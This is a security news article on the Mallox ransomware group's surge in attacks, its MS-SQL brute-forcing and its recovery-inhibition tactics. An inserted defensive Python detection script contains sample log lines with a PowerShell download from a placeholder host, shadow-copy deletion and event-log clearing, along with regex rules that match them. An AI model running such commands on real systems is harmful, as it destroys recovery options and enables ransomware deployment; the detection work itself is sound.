Heimdal

The Mallox ransomware group, also known as TargetCompany, Fargo, and Tohnichi, has become increasingly active, signaling a significant shift in its operations. According to recent findings, Mallox’s ransomware activities in 2023 have seen a staggering 174% increase compared to the previous year.

Researchers' Findings

Security researchers from Palo Alto Networks Unit 42 reported that Mallox, like other ransomware actors, has adopted the double-extortion tactic: it steals sensitive data from breached organizations before encrypting their files, then threatens to publish the stolen data on a leak site to coerce victims into paying the ransom.

This ransomware group is linked to a broader threat actor associated with various ransomware strains, including TargetCompany, Tohnichi, Fargo, and Xollam.

[Figure: attacks increase (Source)]

Characteristics

One noteworthy characteristic of Mallox is its modus operandi of exploiting poorly secured MS-SQL servers through dictionary attacks. These vulnerable servers act as a penetration vector to infiltrate victims’ networks. However, researchers have also observed Mallox deviating from this norm by using malicious OneNote file attachments for initial access.

Furthermore, once Mallox gains a foothold on the compromised host, it executes a PowerShell command to retrieve the ransomware payload from a remote server. The binary then takes measures to hinder recovery efforts by stopping and removing SQL-related services, deleting volume shadow copies, clearing system event logs, and terminating security-related processes. After encrypting the victim’s data, Mallox drops a ransom note in every directory.

[Figure: ransom note (Source)]
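As an added illustration (not part of the Heimdal article or of Unit 42's research), the following Python shows how a defender could look in their own telemetry for the two behaviours described above: a burst of failed MS-SQL logins from a single client, and the chain of recovery-inhibition commands on one host. The log formats, the sample lines, the rule patterns and the thresholds are all assumptions.

```python
import re
from collections import Counter

# Constructed sample telemetry (not from the article): SQL Server failed-login
# lines plus endpoint process-creation records.
SAMPLE_LOGS = [
    f"2023-07-20 10:00:0{i} Login failed for user 'sa'. [CLIENT: 203.0.113.5]" for i in range(6)
] + [
    "2023-07-20 10:00:09 Login failed for user 'app_user'. [CLIENT: 198.51.100.9]",
    'ProcessCreate host=SQL01 cmd="powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/a -OutFile C:\\Temp\\a.exe"',
    'ProcessCreate host=SQL01 cmd="net stop MSSQLSERVER /y"',
    'ProcessCreate host=SQL01 cmd="vssadmin.exe delete shadows /all /quiet"',
    'ProcessCreate host=SQL01 cmd="wevtutil.exe cl System"',
    'ProcessCreate host=WS07 cmd="powershell.exe -c Get-Process"',
]

FAILED_LOGIN = re.compile(r"Login failed for user '([^']+)'.*\[CLIENT: ([\d.]+)\]")
PROC_CREATE = re.compile(r'ProcessCreate host=(\S+) cmd="(.*)"')

# Post-access behaviours the article attributes to Mallox, as command-line
# patterns a defender can match in process-creation telemetry (assumed rules).
POST_ACCESS_RULES = {
    "powershell_download": re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest|webclient)", re.I),
    "sql_service_stop": re.compile(r"\b(net|sc)(\.exe)?\s+stop\b.*sql", re.I),
    "shadow_copy_deletion": re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy.*delete", re.I),
    "event_log_clearing": re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I),
}

def sql_login_bursts(lines, threshold=5):
    # {client_ip: failures} for sources at or above the threshold: the shape of
    # a dictionary attack against an exposed MS-SQL listener.
    counts = Counter(m.group(2) for m in map(FAILED_LOGIN.search, lines) if m)
    return {ip: n for ip, n in counts.items() if n >= threshold}

def post_access_hits(lines):
    # (rule, host, cmd) for every process-creation record matching a rule.
    hits = []
    for host, cmd in (m.groups() for m in map(PROC_CREATE.search, lines) if m):
        hits += [(rule, host, cmd) for rule, p in POST_ACCESS_RULES.items() if p.search(cmd)]
    return hits

def hosts_with_recovery_inhibition(hits, min_rules=2):
    # Hosts on which at least min_rules distinct rules fired; requiring the chain
    # cuts false positives from a lone admin running vssadmin or wevtutil.
    by_host = {}
    for rule, host, _ in hits:
        by_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in by_host.items() if len(rules) >= min_rules)
```

On the sample data, `sql_login_bursts` flags 203.0.113.5 and `hosts_with_recovery_inhibition` flags SQL01, while the benign PowerShell call on WS07 matches nothing.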

Despite being a relatively small and closed group in the past, Mallox has been actively recruiting affiliates for its ransomware-as-a-service (RaaS) program, which might explain the recent surge in its activities.

Further Context and Mitigations

The sudden escalation in Mallox infections is part of a broader trend in the ransomware landscape. Ransomware attacks in general have surged by 221% year-over-year as of June 2023, with a total of 434 attacks reported in that month alone, largely driven by the Clop ransomware group's exploitation of the MOVEit file transfer software vulnerability.

The researchers warned that the heightened activity of the Mallox ransomware group, coupled with the recruitment efforts, could lead to more attacks on organizations if successful.

To defend against such threats, organizations are advised to ensure the proper configuration of internet-facing applications, keep all systems patched and up to date, and implement endpoint security controls for detecting suspicious activities. Being proactive in cybersecurity measures remains the best defense against ransomware threats like Mallox.

You can find the full, comprehensive article on How to Mitigate Ransomware here.

If you liked this article, follow us on LinkedIn, Twitter, Facebook, and YouTube for more cybersecurity news and topics.

Author Profile

Mihaela Popa

COMMUNICATIONS & PR OFFICER

Mihaela is a digital content creator for Heimdal® and the proud owner of an old soul and a curious mind. Passionate to learn and discover more about cybersecurity, she will gladly share her latest finds with you.
